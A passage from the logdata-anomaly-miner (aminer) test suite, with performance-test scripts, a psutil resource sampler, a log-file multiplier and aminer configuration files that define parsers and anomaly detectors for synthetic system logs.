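  "$waitingTime" "$LINE_NUMBER" "$MACHINE_NAME" "$CPU_NAME" "$CPU_Number" "$RAM_Used" "$Persistent_Memory_Type" "$t" "$MD5" "$description" >> "$RESULTS_PATH"
# The sampler writes its rows only when it exits. The former "KILL_PID=$!"
# after a foreground pkill captured the already-finished "sleep 3" job, so
# the script could finish before the rows were written; wait for the real PID.
wait "$GEN_PID"
mv "$RESULTS_PATH" "$RESULTS_DIR"
cp "$FILE" "$RESULTS_DIR/config_$t.py"
echo ""
echo "Performance test finished!"
logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/generateSystemLogdata.py000066400000000000000000000034051437606560100326410ustar00rootroot00000000000000
# This file can be used to test the VariableTypeDetector. It provides discrete
# and continuous data measured from the running system.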
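import multiprocessing
import sys
import time
from datetime import datetime

import psutil

# Sample system-wide and aminer-specific resource usage once per second for
# sys.argv[1] seconds and append the rows as CSV to RESULTS_PATH. The whole
# table is written once, when sampling ends.
RESULTS_PATH = '/tmp/results.csv'  # skipcq: BAN-B108
CPU_COUNT = multiprocessing.cpu_count()

with open(RESULTS_PATH, 'a+', buffering=100) as file:
    header = ['time', 'aminerCpuUsage', 'aminerMemUsage']
    header += ['cpu%d' % (i + 1) for i in range(CPU_COUNT)]
    header += ['vmTotal', 'vmAvailable', 'vmPercent', 'vmUsed', 'vmFree']
    rows = [','.join(header)]
    endTime = time.time() + int(sys.argv[1])
    p = None           # psutil.Process handle of the newest aminer process seen so far
    ppid = None        # its pid
    firstRead = False  # True right after (re)attaching; that sample is discarded
    while time.time() < endTime:
        t = time.time()
        # Follow the aminer process with the highest pid, i.e. the most recently started one.
        for proc in psutil.process_iter():
            try:
                is_aminer = psutil.pid_exists(proc.pid) and proc.name() == "aminer"
            except (psutil.NoSuchProcess, psutil.AccessDenied):
                # The process vanished (or is not inspectable) between listing and name(); skip it.
                continue
            if is_aminer:
                pid = proc.pid
                if p is None or pid > ppid:
                    ppid = pid
                    p = psutil.Process(ppid)
                    firstRead = True
        # ppid stays None until an aminer process has been seen; pid_exists(None) raises.
        if ppid is not None and psutil.pid_exists(ppid):
            try:
                aminerCpu = str(p.cpu_percent(interval=0.0))
                mem = "%.2f" % p.memory_percent()
            except psutil.NoSuchProcess:
                aminerCpu = '-'
                mem = '-'
        else:
            aminerCpu = '-'
            mem = '-'
        cpus = psutil.cpu_percent(percpu=True)
        dt = datetime.fromtimestamp(time.time()).strftime("%Y-%m-%d %H:%M:%S")
        vm = psutil.virtual_memory()
        if firstRead:
            # The first cpu_percent() after attaching has no reference interval; drop that sample.
            firstRead = False
        else:
            fields = [dt, aminerCpu, mem]
            fields += [str(c) for c in cpus[:CPU_COUNT]]
            fields += [str(vm[0]), str(vm[1]), str(vm[2]), str(vm[3]), str(vm[4])]
            rows.append(','.join(fields))
        # Pace the loop to roughly one sample per second.
        delta = time.time() - t
        if delta < 1:
            time.sleep(1 - delta)
    file.write('\n'.join(rows) + '\n')
logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/multiplyLogFile.sh000077500000000000000000000010641437606560100314530ustar00rootroot00000000000000
if [[ $# -lt 3 ]]; then echo "Error, not enough parameters found!" echo "Please run the script as follows: ./multiplyLogFile.sh numberOfCopies templateFile targetFile" echo "For example: ./multiplyLogFile.sh 2700000 syslog-template /tmp/syslog" exit fi iterations=$1 src=$2 target=$3 sudo rm $target 2> /dev/null # read the sourcefile into an array.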
mapfile -t srcArray < $src i=0 while [ $i -lt $iterations ]; do if [ $i -eq 0 ]; then printf "%s\n" "${srcArray[@]}" > $target else printf "%s\n" "${srcArray[@]}" >> $target fi i=$((i + 1)) done logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/performance-config.py000066400000000000000000000140631437606560100321140ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. 
When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. 
This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement parsing_model = AnyByteDataModelElement('AnyByteDataModelElement') # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector( analysis_context.aminer_config, ['/AnyByteDataModelElement'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/performance-config1.py000066400000000000000000000436151437606560100322020ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import 
OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. 
When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. 
""" date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ 
DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. 
allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/Job Number'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) 
analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") 
atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector 
cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/performance-config2.py000066400000000000000000000550561437606560100322050ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import 
HexStringModelElement from aminer.parsing.MultiLocaleDateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. 
The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. 
config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [ b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [ SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), 
SequenceModelElement('CPUWorkload', [ FixedDataModelElement('Fixed Workload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') 
